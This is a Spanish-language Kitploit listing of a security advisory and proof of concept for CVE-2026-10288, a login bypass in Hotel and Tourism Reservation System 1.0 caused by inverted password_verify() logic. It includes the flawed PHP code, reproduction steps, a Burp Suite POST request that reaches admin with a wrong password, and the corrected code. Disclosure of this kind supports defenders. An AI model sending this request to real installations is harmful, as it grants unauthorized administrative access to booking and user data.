Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-10288-AUTH-BYPASS — Exploit de prueba de concepto para un bypass de autenticación en Hotel and Tourism Reservation System 1.0, permitiendo acceso de administrador no autenticado mediante lógica invertida de password_verify. | Kitploit
Herramientas/GitHubGitHub/xmyronn/cve-2026-10288-auth-bypass
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAutenticación
GitHubxmyronn/cve-2026-10288-auth-bypass

CVE-2026-10288-AUTH-BYPASS

Exploit de prueba de concepto para un bypass de autenticación en Hotel and Tourism Reservation System 1.0, permitiendo acceso de administrador no autenticado mediante lógica invertida de password_verify.

Ver Repositorio
46hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Sistema de Reservas de Hotel y Turismo - Bypass de Autenticación

Detalles de la Vulnerabilidad

CampoDetalles
TítuloSistema de Reservas de Hotel y Turismo - Bypass de Autenticación
Vendedorcode-projects.org
ProductoSistema de Reservas de Hotel y Turismo
Versión1.0
Tipo de VulnerabilidadAutenticación Incorrecta
CWECWE-287
Puntuación CVSS9.0 (Crítica)
Vector CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Archivo Afectado/admin/login.php
Autenticación RequeridaNo
Explotable RemotamenteSí

Descripción

Existe una vulnerabilidad crítica de bypass de autenticación en la funcionalidad de inicio de sesión de administrador de Hotel and Tourism Reservation System 1.0. La vulnerabilidad es causada por una verificación condicional invertida en el valor de retorno de password_verify(), que hace que la aplicación otorgue acceso cuando se proporciona una contraseña incorrecta y deniegue el acceso cuando se proporciona la contraseña correcta. Un atacante remoto no autenticado puede obtener acceso administrativo completo proporcionando una dirección de correo electrónico válida y cualquier contraseña incorrecta arbitraria.


Causa Raíz

Archivo: admin/login.php — Líneas 39–46

root@kitploit:~
if(password_verify($password, $user['password'])){
    // BUG: password_verify() returns TRUE when password is CORRECT
    // but the error message is placed here instead of login logic
    echo '<div class="w3-text-red text-center">The password you entered was incorrect, please try again.</div>';
} else {
    // BUG: this block executes when password is WRONG
    // but login is granted here instead of showing an error
    $userID = $user['id'];
    login($userID);
}

password_verify() devuelve true cuando la contraseña proporcionada coincide con el hash. El desarrollador colocó la lógica de éxito dentro de la rama else (que se ejecuta cuando la función devuelve false), lo que significa que la autenticación se concede con cualquier contraseña incorrecta.


Impacto

Un atacante remoto no autenticado puede:

  • Obtener acceso administrativo completo a la aplicación
  • Ver, modificar y eliminar todas las reservas de habitaciones y tours
  • Agregar, editar o eliminar habitaciones, tours y eventos
  • Acceder a todos los datos de usuarios registrados
  • Realizar todas las operaciones de administrador sin conocer la contraseña de administrador

Pasos para Reproducir

Configuración: Instale Hotel and Tourism Reservation System 1.0 en XAMPP. Acceda a la aplicación en http://localhost/ht/.

Paso 1: Navegue a la página de inicio de sesión del administrador.

http:///ht/admin/login.php

Paso 2: Ingrese un correo electrónico de administrador válido con cualquier contraseña incorrecta.

Email: [email protected] Password: wrongpassword

Paso 3: Haga clic en Iniciar sesión.

Resultado: La aplicación omite la autenticación y redirige al panel de administración (index.php) — se concede acceso administrativo completo con una contraseña incorrecta.


Prueba de Concepto (Burp Suite)

Solicitud:

root@kitploit:~
POST /ht/admin/login.php HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded

email=admin%40admin.com&password=test1234&login=Login

Respuesta:

root@kitploit:~
HTTP/1.1 302 Found
Location: index.php

Una redirección 302 a index.php confirma la autenticación exitosa con una contraseña incorrecta.


Capturas de Pantalla

1. Página de Inicio de Sesión — Contraseña Incorrecta Ingresada

Captura de pantalla 2026-05-11 232154

2. Burp Suite — Redirección 302 Confirma el Bypass

Captura de pantalla 2026-05-11 232205

3. Código Fuente — Lógica Invertida

Captura de pantalla 2026-05-11 232228

Corrección Recomendada

Intercambie las ramas condicionales para que el inicio de sesión se conceda cuando password_verify() devuelva true:

root@kitploit:~
// FIXED
if(password_verify($password, $user['password'])){
    $userID = $user['id'];
    login($userID);
} else {
    echo '<div class="w3-text-red text-center">The password you entered was incorrect, please try again.</div>';
}

Referencias

  • CWE-287: Autenticación Incorrecta
  • Sistema de Reservas de Hotel y Turismo — code-projects.org

Descubierto Por

Imad Alvi — Investigador de Seguridad Independiente

Descargar herramienta